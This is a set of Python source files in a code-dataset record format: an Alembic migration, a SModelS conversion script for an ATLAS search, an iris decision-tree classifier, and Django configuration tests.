"usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 185, "usage_type": "call"}, {"api_name": "scipy.stats.spearmanr", "line_number": 187, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 187, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 188, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 188, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 189, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 189, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 190, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 190, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", 
"line_number": 197, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 197, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 198, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 198, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 199, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 199, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 200, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 200, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 208, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 208, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 209, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 209, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 211, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 211, "usage_type": "attribute"}, {"api_name": "numpy.add", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 301, "usage_type": "call"}]} +{"seq_id": "531593115", "text": "\"\"\"empty message\n\nRevision ID: 1f249eadb14\nRevises: 27ca60a84b4f\nCreate Date: 2015-11-13 22:09:59.622000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1f249eadb14'\ndown_revision = '27ca60a84b4f'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('answer', sa.Column('remark', sa.Unicode(length=120), nullable=True))\n op.drop_column('answer', 'description')\n op.add_column('question', sa.Column('remark', sa.Unicode(length=120), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('question', 'remark')\n op.add_column('answer', sa.Column('description', mysql.VARCHAR(length=100), nullable=True))\n op.drop_column('answer', 'remark')\n ### end Alembic commands ###\n", "sub_path": "migrations/versions/1f249eadb14_.py", "file_name": "1f249eadb14_.py", "file_ext": "py", "file_size_in_byte": 921, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "alembic.op.add_column", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 19, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Unicode", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 20, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.Unicode", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 28, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "31446844", "text": "#!/usr/bin/env python\n\n\"\"\"\n.. 
module:: convert\n :synopsis: used to create info.txt and the .txt files.\n\n\"\"\"\nimport sys\nimport os\nimport argparse\nimport types\n\nargparser = argparse.ArgumentParser(description = \n'create info.txt, txname.txt, twiki.txt and sms.py')\nargparser.add_argument ('-utilsPath', '--utilsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str)\nargparser.add_argument ('-smodelsPath', '--smodelsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str)\nargs = argparser.parse_args()\n\nif args.utilsPath:\n utilsPath = args.utilsPath\nelse:\n databaseRoot = '../../../'\n sys.path.append(os.path.abspath(databaseRoot))\n from utilsPath import utilsPath\n utilsPath = databaseRoot + utilsPath\nif args.smodelsPath:\n sys.path.append(os.path.abspath(args.smodelsPath))\n\nsys.path.append(os.path.abspath(utilsPath))\nfrom smodels_utils.dataPreparation.inputObjects import MetaInfoInput,DataSetInput\nfrom smodels_utils.dataPreparation.databaseCreation import databaseCreator\nfrom smodels_utils.dataPreparation.massPlaneObjects import x, y, z\n\n\n\n#+++++++ global info block ++++++++++++++\ninfo = MetaInfoInput('ATLAS-CONF-2013-047')\ninfo.comment = 'T5WWLSP060 and T6WWLSP060 originally have xvalue on y-axes, changed by us to M2'\ninfo.sqrts = '8.0'\ninfo.private = False\ninfo.lumi = '20.3'\ninfo.url = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/; http://cds.cern.ch/record/1547563'\ninfo.supersededBy = 'ATLAS-SUSY-2013-02'\ninfo.prettyName = '0 leptons + 2-6 jets + Etmiss'\n\n\n#+++++++ dataset block ++++++++++++++\ndataset = DataSetInput('data')\ndataset.setInfo(dataType = 'upperLimit', dataId = None)\n\n#+++++++ next txName block ++++++++++++++\nTGQ = dataset.addTxName('TGQ')\nTGQ.checked =\"VM\"\nTGQ.constraint =\"[[['jet']],[['jet','jet']]]\"\nTGQ.conditionDescription =\"None\"\nTGQ.condition =\"None\"\nTGQ.source = 'ATLAS'\nTGQ.round_to = 6 ## round to 6 digits to make PCA work.\n#+++++++ next mass plane block ++++++++++++++\nTGQ0 = TGQ.addMassPlane([[0.96*x, y], [x,y]])\nTGQ0.figure = 'Fig. 19b'\nTGQ0.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19b.png'\nTGQ0.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19b_PRELIMINARY.data'\nTGQ0.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/TGQ_exc.dat', 'orig/TGQ.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\n\n#+++++++ next txName block ++++++++++++++\nT6WW = dataset.addTxName('T6WW')\nT6WW.checked =\"VM\"\nT6WW.constraint =\"[[['jet'],['W']],[['jet'],['W']]]\"\nT6WW.conditionDescription =\"None\"\nT6WW.condition =\"None\"\nT6WW.massConstraint = None\nT6WW.source = 'ATLAS'\nT6WWoff = dataset.addTxName('T6WWoff')\nT6WWoff.constraint =\"2.23 * [[['jet'],['jet','jet']],[['jet'],['jet','jet']]]\"\nT6WWoff.conditionDescription = \"None\"\nT6WWoff.condition = \"None\"\nT6WWoff.massConstraint = [['dm >= 0.0', 'dm <= 76.0'], ['dm >= 0.0', 'dm <= 76.0']]\nT6WWoff.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT6WWLSP060 = T6WW.addMassPlane(2*[[x, y, 60.0]])\nT6WWLSP060.figure = 'Fig. 
21c'\nT6WWLSP060.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21c.png'\nT6WWLSP060.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21c_PRELIMINARY.data'\nT6WWLSP060.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T6WWLSP060_exc.dat', 'orig/T6WWLSP060.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\nT6WWoff.addMassPlane(T6WWLSP060)\n#+++++++ next mass plane block ++++++++++++++\nT6WW050 = T6WW.addMassPlane(2*[[x, x*0.5+(1.-0.5)*y, y]])\nT6WW050.figure = 'Fig. 21d'\nT6WW050.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21d.png'\nT6WW050.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21d_PRELIMINARY.data'\nT6WW050.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T6WW050_exc.dat', 'orig/T6WW050.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\nT6WWoff.addMassPlane(T6WW050)\n\n#+++++++ next txName block ++++++++++++++\nT2 = dataset.addTxName('T2')\nT2.checked =\"VM\"\nT2.constraint =\"[[['jet']],[['jet']]]\"\nT2.conditionDescription =\"None\"\nT2.condition =\"None\"\nT2.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT2 = T2.addMassPlane(2*[[x, y]])\nT2.figure = 'Fig. 19c'\nT2.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19c.png'\nT2.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19c_PRELIMINARY.data'\nT2.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T2_exc.dat', 'orig/T2.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\n\n#+++++++ next txName block ++++++++++++++\nT1 = dataset.addTxName('T1')\nT1.checked =\"VM\"\nT1.constraint =\"[[['jet','jet']],[['jet','jet']]]\"\nT1.conditionDescription =\"None\"\nT1.condition =\"None\"\nT1.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT1 = T1.addMassPlane(2*[[x, y]])\nT1.figure = 'Fig. 19a'\nT1.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19a.png'\nT1.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19a_PRELIMINARY.data'\nT1.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T1_exc.dat', 'orig/T1.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\n\n#+++++++ next txName block ++++++++++++++\nT5WW = dataset.addTxName('T5WW')\nT5WW.checked =\"VM\"\nT5WW.constraint =\"[[['jet','jet'],['W']],[['jet','jet'],['W']]]\"\nT5WW.conditionDescription =\"None\"\nT5WW.condition =\"None\"\nT5WW.massConstraint = None\nT5WW.source = 'ATLAS'\nT5WWoff = dataset.addTxName('T5WWoff')\nT5WWoff.constraint = \"2.23 * [[['jet','jet'],['jet','jet']],[['jet','jet'],['jet','jet']]]\"\nT5WWoff.conditionDescription = \"None\"\nT5WWoff.condition = \"None\"\nT5WWoff.massConstraint = [['dm >= 0.0', 'dm <= 76.0'], ['dm >= 0.0', 'dm <= 76.0']]\nT5WWoff.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT5WWLSP060 = T5WW.addMassPlane(2*[[x, y, 60.0]])\nT5WWLSP060.figure = 'Fig. 
21a'\nT5WWLSP060.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21a.png'\nT5WWLSP060.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21b_PRELIMINARY.data'\nT5WWLSP060.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T5WWLSP60_exc.dat', 'orig/T5WWLSP060.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\nT5WWoff.addMassPlane(T5WWLSP060)\n#+++++++ next mass plane block ++++++++++++++\nT5WW050 = T5WW.addMassPlane(2*[[x, x*0.5+(1.-0.5)*y, y]])\nT5WW050.figure = 'Fig. 21b'\nT5WW050.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21b.png'\nT5WW050.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21a_PRELIMINARY.data'\nT5WW050.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T5WW050_exc.dat', 'orig/T5WW050.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\nT5WWoff.addMassPlane(T5WW050)\n\n#+++++++ next txName block ++++++++++++++\nT5tctc = dataset.addTxName('T5tctc')\nT5tctc.checked =\"VM\"\nT5tctc.constraint =\"[[['t'],['jet']],[['t'],['jet']]]\"\nT5tctc.conditionDescription =\"None\"\nT5tctc.condition =\"None\"\nT5tctc.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT5tctcD020 = T5tctc.addMassPlane(2*[[x, y, y-20.0]])\nT5tctcD020.figure = \"fig 24\"\nT5tctcD020.figureUrl = \"https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_24.png\"\nT5tctcD020.dataUrl = \"https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_24_PRELIMINARY.data\"\nT5tctcD020.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T5tctc_exc.dat', 'orig/T5tctc.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\n\n\n\ndatabaseCreator.create()\n", "sub_path": "smodels-database/8TeV/ATLAS/ATLAS-CONF-2013-047/convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 8304, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "utilsPath.utilsPath", "line_number": 29, "usage_type": "name"}, {"api_name": "sys.path.append", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 33, "usage_type": "call"}, {"api_name": "utilsPath.utilsPath", "line_number": 33, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "smodels_utils.dataPreparation.inputObjects.MetaInfoInput", "line_number": 41, "usage_type": "call"}, {"api_name": "smodels_utils.dataPreparation.inputObjects.DataSetInput", "line_number": 52, "usage_type": "call"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", 
"line_number": 64, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 64, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 87, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 87, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 96, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 96, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 113, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 113, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 129, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 129, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 152, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 152, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 161, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 161, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 178, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 178, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.databaseCreation.databaseCreator.create", "line_number": 188, "usage_type": "call"}, {"api_name": "smodels_utils.dataPreparation.databaseCreation.databaseCreator", "line_number": 188, "usage_type": "name"}]} +{"seq_id": "473414916", "text": "from sklearn import tree # decision tree model\r\nfrom sklearn.datasets import load_iris # import dataset\r\nfrom sklearn.model_selection import train_test_split # splitting our data\r\nimport numpy as np\r\nfrom sklearn.metrics import confusion_matrix, classification_report\r\nimport matplotlib.pyplot as plt\r\nimport itertools\r\n\r\ndata = load_iris() # load iris data\r\nclass_names = data.target_names\r\nprint(dir(data)) # show dataset meta\r\n\r\n# prepare train and test dataset\r\nx_train, x_test, y_train, y_test = \\\r\n train_test_split(data.data, data.target, test_size=0.20, random_state=42)\r\n\r\n# show data size --> 120 samples and 4 attributes per sample\r\nprint(\"Training set with 4 features per sample\" + str(x_train.shape))\r\nprint(\"Test set with 4 features per sample\" + str(x_test.shape))\r\nprint(\"Classes for training set\" + str(y_train.shape))\r\nprint(\"Classes for test set\" + str(y_test.shape))\r\n\r\nc45_classifier = tree.DecisionTreeClassifier(criterion='entropy') # classifier object\r\n# c45_classifier.fit(x_train, y_train) # fit/train the model\r\n\r\n# train and test the model\r\ny_pred = c45_classifier.fit(x_train, y_train).predict(x_test)\r\n\r\n# calculate train accuracy\r\ntrain_accuracy = (np.sum(c45_classifier.predict(x_train) == y_train) / float(y_train.size)) * 100\r\n\r\n# calculate test accuracy\r\ntest_accuracy = (np.sum(c45_classifier.predict(x_test) == y_test) / float(y_test.size)) * 100\r\n\r\n# print accuracies\r\nprint(\"Model accuray on train sample \", str(train_accuracy) + \"%\")\r\nprint(\"Model accuray on test sample\", 
str(test_accuracy) + \"%\")\r\n\r\n# precision, recall, f1-score, support\r\nprint(classification_report(y_test, y_pred))\r\n\r\n# export our decision tree\r\nwith open('iris_classifier.txt', 'w') as export_file: # create file object\r\n # write c45_classifier info to export_file using export_graphviz\r\n tree.export_graphviz(c45_classifier,\r\n out_file=export_file,\r\n feature_names=data.feature_names,\r\n class_names=data.target_names,\r\n filled=True)\r\n\r\n\r\ndef plot_confusion_matrix(cm, classes,\r\n normalize=False,\r\n title='Confusion matrix',\r\n cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n print(\"Normalized confusion matrix\")\r\n else:\r\n print('Confusion matrix, without normalization')\r\n\r\n print(cm)\r\n\r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n plt.title(title)\r\n plt.colorbar()\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45)\r\n plt.yticks(tick_marks, classes)\r\n\r\n fmt = '.2f' if normalize else 'd'\r\n thresh = cm.max() / 2.\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, format(cm[i, j], fmt),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n\r\n plt.tight_layout()\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label')\r\n\r\n\r\n# Compute confusion matrix\r\ncnf_matrix = confusion_matrix(y_test, y_pred)\r\nnp.set_printoptions(precision=2)\r\n\r\n# Plot non-normalized confusion matrix\r\nplt.figure()\r\nplot_confusion_matrix(cnf_matrix, classes=class_names,\r\n title='Confusion matrix, without normalization')\r\n\r\n# Plot normalized confusion matrix\r\nplt.figure()\r\nplot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,\r\n title='confusion matrix for Iris Data Set')\r\n\r\n# show confusion matrix figures\r\nplt.show()\r\n", "sub_path": "iris_classifier.py", "file_name": "iris_classifier.py", "file_ext": "py", "file_size_in_byte": 3766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 9, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 55, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.newaxis", "line_number": 61, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "itertools.product", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.set_printoptions", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}]} +{"seq_id": "600815648", "text": "from tests.setup import setup\nsetup()\nfrom django.test import TestCase\nfrom django.contrib import admin\nfrom django.db import IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom configuration.models import Configuration\nfrom test_app.models import (\n AbstractConfiguration,\n EmptyConfiguration,\n SubChildConfiguration,\n AdminStringConfiguration,\n AdminModelConfiguration,\n CustomAdmin,\n)\nfrom configuration.admin import ConfigurationAdmin, ConfigurationParentAdmin\nfrom configuration.templatetags.configuration import get_configuration\n\n\nclass ConfigurationTestCase(TestCase):\n def test_get_admin_class(self):\n c = Configuration()\n self.assertEqual(c.admin_class,\n 'configuration.admin.ConfigurationAdmin')\n self.assertIs(c.get_admin_class(), c.admin_class)\n\n def test_get_description(self):\n c = Configuration()\n self.assertEqual(c.description, 'Configuration')\n self.assertIs(c.get_description(), c.description)\n\n def test_repr(self):\n c = AbstractConfiguration()\n self.assertEqual(str(c), \"Test test\")\n\n def test_unique(self):\n EmptyConfiguration.objects.create()\n with self.assertRaises(IntegrityError):\n EmptyConfiguration.objects.create()\n\n\nclass ConfigurationManagerTestCase(TestCase):\n def test_child_get_args(self):\n with self.assertRaises(AssertionError):\n EmptyConfiguration.objects.get(1)\n\n with self.assertRaises(AssertionError):\n EmptyConfiguration.objects.get(pk=1)\n\n def test_child_get_exists(self):\n c = EmptyConfiguration.objects.create()\n self.assertEqual(c.pk, 
EmptyConfiguration.objects.get().pk)\n\n def test_child_get_new(self):\n self.assertIs(EmptyConfiguration.objects.get().pk, None)\n\n def test_base_get(self):\n with self.assertRaises(ObjectDoesNotExist):\n Configuration.objects.get()\n\n c = EmptyConfiguration.objects.create()\n Configuration.objects.get()\n Configuration.objects.get(pk=c.pk)\n\n\nclass ConfigurationAdminTestCase(TestCase):\n def test_permissions(self):\n ca = ConfigurationAdmin(EmptyConfiguration, admin.site)\n self.assertEqual(ca.has_add_permission(None), False)\n self.assertEqual(ca.has_delete_permission(None), False)\n\n\nclass ConfigurationParentAdminTestCase(TestCase):\n def test_permissions(self):\n cpa = ConfigurationParentAdmin(Configuration, admin.site)\n self.assertEqual(cpa.has_add_permission(None), False)\n self.assertEqual(cpa.has_delete_permission(None), False)\n\n def test_child_models(self):\n cpa = ConfigurationParentAdmin(Configuration, admin.site)\n self.assertEqual(\n cpa.get_child_models(),\n ((SubChildConfiguration, ConfigurationAdmin),\n (EmptyConfiguration, ConfigurationAdmin),\n (AdminStringConfiguration, CustomAdmin),\n (AdminModelConfiguration, CustomAdmin))\n )\n\n\nclass TemplateTagsTestCase(TestCase):\n def test_bad_strings(self):\n with self.assertRaisesRegexp(ValueError, \"^app is not a model$\"):\n get_configuration(\"app\")\n\n with self.assertRaisesRegexp(ValueError,\n \"^Could not find model app.model$\"):\n get_configuration(\"app.model\")\n\n with self.assertRaisesRegexp(ValueError,\n \"^contenttypes.ContentType \"\n \"is not a Configuration$\"):\n get_configuration(\"contenttypes.ContentType\")\n\n with self.assertRaisesRegexp(ValueError,\n \"^Could not find model \"\n \"test_app.AbstractConfiguration$\"):\n get_configuration(\"test_app.AbstractConfiguration\")\n\n def test_get(self):\n c = get_configuration(\"test_app.EmptyConfiguration\")\n self.assertIs(type(c), EmptyConfiguration)\n", "sub_path": "tests/test_configuration.py", "file_name": "test_configuration.py", "file_ext": "py", "file_size_in_byte": 3992, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tests.setup.setup", "line_number": 2, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 20, "usage_type": "name"}, {"api_name": "configuration.models.Configuration", "line_number": 22, "usage_type": "call"}, {"api_name": "configuration.models.Configuration", "line_number": 28, "usage_type": "call"}, {"api_name": "test_app.models.AbstractConfiguration", "line_number": 33, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects.create", "line_number": 37, "usage_type": "call"}, {"api_name": 